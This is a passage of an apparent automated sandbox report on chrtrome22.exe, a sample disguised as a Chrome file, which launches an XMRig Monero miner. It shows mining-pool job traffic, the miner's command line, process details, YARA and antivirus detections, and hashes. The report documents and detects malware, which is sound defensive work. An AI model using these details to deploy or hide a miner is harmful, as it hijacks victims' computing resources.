4a 34 2b 71 41 58 22 2c 22 74 61 72 67 65 74 22 3a 22 63
                                                                          Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"101082fcfdbb0618b7029a51e634960100d84e550beedff159c6845536d30920d0c6194fae6ea300000000d4071e9ddb217e76f7ff2f801547f6fda4eda5bac54c65e4ebd3628cd1918efc1b","job_id":"CcckiO+7rYx1t/dxxLpqWmJ4+qAX","target":"c
                                                                          2025-01-09 07:43:15 UTC420INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 39 32 66 63 66 64 62 62 30 36 31 38 62 37 30 32 39 61 35 31 65 36 33 34 39 36 30 31 30 30 64 38 34 65 35 35 30 62 65 65 64 66 66 31 35 39 63 36 38 34 35 35 33 36 64 33 30 39 32 30 64 30 63 36 31 39 34 66 61 65 36 65 61 33 30 30 30 30 30 30 30 30 38 62 39 65 31 64 62 31 33 62 63 37 31 31 32 65 36 64 37 64 38 36 37 33 38 62 30 64 38 34 33 65 32 62 65 65 39 66 37 30 36 64 33 31 39 37 32 66 61 35 34 61 37 39 63 36 38 62 64 31 65 66 63 30 31 65 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 53 61 31 6a 76 64 58 45 68 30 71 6a 43 78 32 68 6a 67 47 52 4d 4a 32 49 76 6c 6b 56 22 2c 22 74 61 72 67 65 74 22 3a 22 63
                                                                          Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"101092fcfdbb0618b7029a51e634960100d84e550beedff159c6845536d30920d0c6194fae6ea3000000008b9e1db13bc7112e6d7d86738b0d843e2bee9f706d31972fa54a79c68bd1efc01e","job_id":"Sa1jvdXEh0qjCx2hjgGRMJ2IvlkV","target":"c
                                                                          2025-01-09 07:43:25 UTC420INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 39 63 66 63 66 64 62 62 30 36 31 38 62 37 30 32 39 61 35 31 65 36 33 34 39 36 30 31 30 30 64 38 34 65 35 35 30 62 65 65 64 66 66 31 35 39 63 36 38 34 35 35 33 36 64 33 30 39 32 30 64 30 63 36 31 39 34 66 61 65 36 65 61 33 30 30 30 30 30 30 30 30 62 33 65 66 38 32 35 30 32 62 36 32 30 64 30 63 30 64 31 36 35 30 35 36 34 64 38 33 30 35 62 63 32 61 65 30 39 39 63 36 39 64 66 64 65 62 61 32 31 39 38 34 39 34 64 38 63 64 63 65 61 66 30 62 32 32 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 45 56 6b 4d 52 47 63 65 2f 37 59 44 32 4f 4a 47 74 52 31 4d 46 62 33 53 57 63 2f 6d 22 2c 22 74 61 72 67 65 74 22 3a 22 63
                                                                          Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"10109cfcfdbb0618b7029a51e634960100d84e550beedff159c6845536d30920d0c6194fae6ea300000000b3ef82502b620d0c0d1650564d8305bc2ae099c69dfdeba2198494d8cdceaf0b22","job_id":"EVkMRGce/7YD2OJGtR1MFb3SWc/m","target":"c
                                                                          2025-01-09 07:43:28 UTC420INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 39 63 66 63 66 64 62 62 30 36 31 38 62 37 30 32 39 61 35 31 65 36 33 34 39 36 30 31 30 30 64 38 34 65 35 35 30 62 65 65 64 66 66 31 35 39 63 36 38 34 35 35 33 36 64 33 30 39 32 30 64 30 63 36 31 39 34 66 61 65 36 65 61 33 30 30 30 30 30 30 30 30 36 38 61 32 38 38 62 65 61 34 32 35 63 36 61 62 35 62 61 30 35 35 35 31 30 63 65 31 35 61 64 63 66 33 64 34 37 39 35 30 65 64 35 33 38 64 66 31 65 61 62 35 61 33 35 64 31 66 66 30 36 62 39 37 32 32 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 52 47 59 65 44 4f 63 37 43 38 4f 31 43 52 58 5a 69 46 68 31 57 53 69 62 65 70 33 4a 22 2c 22 74 61 72 67 65 74 22 3a 22 32
                                                                          Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"10109cfcfdbb0618b7029a51e634960100d84e550beedff159c6845536d30920d0c6194fae6ea30000000068a288bea425c6ab5ba055510ce15adcf3d47950ed538df1eab5a35d1ff06b9722","job_id":"RGYeDOc7C8O1CRXZiFh1WSibep3J","target":"2


                                                                          Statistics

                                                                          CPU Usage

                                                                          Click to jump to process

                                                                          Memory Usage

                                                                          Click to jump to process

                                                                          High Level Behavior Distribution

                                                                          Click to dive into process behavior distribution

                                                                          Behavior

                                                                          Click to jump to process

                                                                          System Behavior

                                                                          General

                                                                          Target ID:0
                                                                          Start time:02:42:05
                                                                          Start date:09/01/2025
                                                                          Path:C:\Users\user\Desktop\chrtrome22.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Users\user\Desktop\chrtrome22.exe"
                                                                          Imagebase:0x620000
                                                                          File size:13'312 bytes
                                                                          MD5 hash:AE96B1FB65498CDF458A52BC197466A5
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000000.00000002.1755040993.0000000002E19000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000000.00000002.1755040993.0000000002E39000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000000.00000002.1755040993.0000000002EF7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000000.00000002.1755040993.0000000002E25000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000000.00000002.1755040993.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000000.00000002.1759218717.000000001D265000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000000.00000002.1755040993.0000000002971000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:1
                                                                          Start time:02:42:05
                                                                          Start date:09/01/2025
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff7699e0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:2
                                                                          Start time:02:42:14
                                                                          Start date:09/01/2025
                                                                          Path:C:\xmrig\xmrig-6.22.2\xmrig.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\xmrig\xmrig-6.22.2\xmrig.exe" --config=C:\xmrig\xmrig-6.22.2\config.json
                                                                          Imagebase:0x7ff640ec0000
                                                                          File size:6'412'800 bytes
                                                                          MD5 hash:F6D520AE125F03056C4646C508218D16
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000002.00000002.4117633923.000002B86C509000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000002.00000000.1753744579.00007FF641770000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000002.00000002.4117633923.000002B86C5AC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000002.00000002.4117633923.000002B86C4DC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000002.00000002.4117633923.000002B86C52A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000002.00000000.1753490788.00007FF6412E7000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                          • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000002.00000000.1753490788.00007FF6412E7000.00000002.00000001.01000000.00000007.sdmp, Author: unknown
                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\xmrig\xmrig-6.22.2\xmrig.exe, Author: Joe Security
                                                                          • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: C:\xmrig\xmrig-6.22.2\xmrig.exe, Author: unknown
                                                                          • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\xmrig\xmrig-6.22.2\xmrig.exe, Author: Florian Roth
                                                                          • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\xmrig\xmrig-6.22.2\xmrig.exe, Author: ditekSHen
                                                                          Antivirus matches:
                                                                          • Detection: 100%, Avira
                                                                          • Detection: 100%, Joe Sandbox ML
                                                                          • Detection: 74%, ReversingLabs
                                                                          Reputation:low
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:3
                                                                          Start time:02:42:14
                                                                          Start date:09/01/2025
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff7699e0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          Disassembly

                                                                          Reset < >

                                                                            Execution Graph

                                                                            Execution Coverage:13.1%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:0%
                                                                            Total number of Nodes:3
                                                                            Total number of Limit Nodes:0
                                                                            execution_graph 5750 7ffd9b880be5 5751 7ffd9b880bf1 GetConsoleWindow 5750->5751 5753 7ffd9b880cce 5751->5753

                                                                            Executed Functions

                                                                            Function 00007FFD9B880BE5 Relevance: 1.7, APIs: 1, Instructions: 154COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1759734900.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffd9b880000_chrtrome22.jbxd
                                                                            Similarity
                                                                            • API ID: ConsoleWindow
                                                                            • String ID:
                                                                            • API String ID: 2863861424-0
                                                                            • Opcode ID: 3a2231455be909da0dc7836ab5ffe008f268e93671296cde8ea2c8d4c8ddfc0f
                                                                            • Instruction ID: f83f84730cb007c9cfb8d1d8ae4158b6c471f3dfb711cf60ef83452f5b7c0dd6
                                                                            • Opcode Fuzzy Hash: 3a2231455be909da0dc7836ab5ffe008f268e93671296cde8ea2c8d4c8ddfc0f
                                                                            • Instruction Fuzzy Hash: 8341E67050E7895FD7278B7898145E5BFF0EF57320B0A42EBC088CB4A3C668594AC7A2
                                                                            Function 00007FFD9B960D21 Relevance: .4, Instructions: 370COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 297 7ffd9b960d21-7ffd9b960daf 301 7ffd9b960db5-7ffd9b960dbf 297->301 302 7ffd9b960f58-7ffd9b960fb6 297->302 303 7ffd9b960dc1-7ffd9b960dd9 301->303 304 7ffd9b960ddb-7ffd9b960de8 301->304 322 7ffd9b960fe1-7ffd9b961007 302->322 323 7ffd9b960fb8-7ffd9b960fdf 302->323 303->304 310 7ffd9b960dee-7ffd9b960df1 304->310 311 7ffd9b960eed-7ffd9b960ef7 304->311 310->311 313 7ffd9b960df7-7ffd9b960dff 310->313 315 7ffd9b960f0a-7ffd9b960f55 311->315 316 7ffd9b960ef9-7ffd9b960f09 311->316 313->302 317 7ffd9b960e05-7ffd9b960e0f 313->317 315->302 320 7ffd9b960e11-7ffd9b960e1f 317->320 321 7ffd9b960e29-7ffd9b960e2f 317->321 320->321 329 7ffd9b960e21-7ffd9b960e27 320->329 321->311 326 7ffd9b960e35-7ffd9b960e38 321->326 341 7ffd9b961010-7ffd9b96101f 322->341 342 7ffd9b961009 322->342 323->322 330 7ffd9b960e4f-7ffd9b960e53 326->330 331 7ffd9b960e3a-7ffd9b960e43 326->331 329->321 330->311 334 7ffd9b960e59-7ffd9b960e5c 330->334 331->330 336 7ffd9b960e73-7ffd9b960e77 334->336 337 7ffd9b960e5e-7ffd9b960e67 334->337 336->311 347 7ffd9b960e79-7ffd9b960e7f 336->347 337->336 345 7ffd9b961021 341->345 346 7ffd9b961028-7ffd9b961039 341->346 342->341 345->346 348 7ffd9b960e81-7ffd9b960e8e 347->348 349 7ffd9b960e9b-7ffd9b960ea1 347->349 348->349 354 7ffd9b960e90-7ffd9b960e99 348->354 350 7ffd9b960ea3-7ffd9b960ebb 349->350 351 7ffd9b960ebd-7ffd9b960ec1 349->351 350->351 355 7ffd9b960ec8-7ffd9b960ed0 351->355 354->349 358 7ffd9b960ed2-7ffd9b960ed6 355->358 359 7ffd9b960ed8-7ffd9b960edd 355->359 360 7ffd9b960ede-7ffd9b960eec 358->360 359->360
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1760065694.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffd9b960000_chrtrome22.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 42f2b2374a951717206f1dc57888a6d9d917c39b4d48f2ad8aeef3ecb67160a4
                                                                            • Instruction ID: 25ff35cf07d59720f4653d446bf46c8f8c0bb0069af8ad3a8c0d0bef374ecc08
                                                                            • Opcode Fuzzy Hash: 42f2b2374a951717206f1dc57888a6d9d917c39b4d48f2ad8aeef3ecb67160a4
                                                                            • Instruction Fuzzy Hash: EAB13631B1EB9D5FE7AA976858E5A743BE1EF82710F0901FAE04DC71E7DA18AC058341
                                                                            Function 00007FFD9B960E6B Relevance: .1, Instructions: 62COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1760065694.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffd9b960000_chrtrome22.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ced07d695c6e27593733db61d8a724426a9074baa0d42d7a4f14e375a2d3eced
                                                                            • Instruction ID: 869498975b03761001574752c9dc1aeaedc5f61021b3a4b9db45f2e1973592b6
                                                                            • Opcode Fuzzy Hash: ced07d695c6e27593733db61d8a724426a9074baa0d42d7a4f14e375a2d3eced
                                                                            • Instruction Fuzzy Hash: 7B014E22F2E92E9FF7BA935C24F51785BC2EF84A20B4901B6D40DC31EEEF18AC014240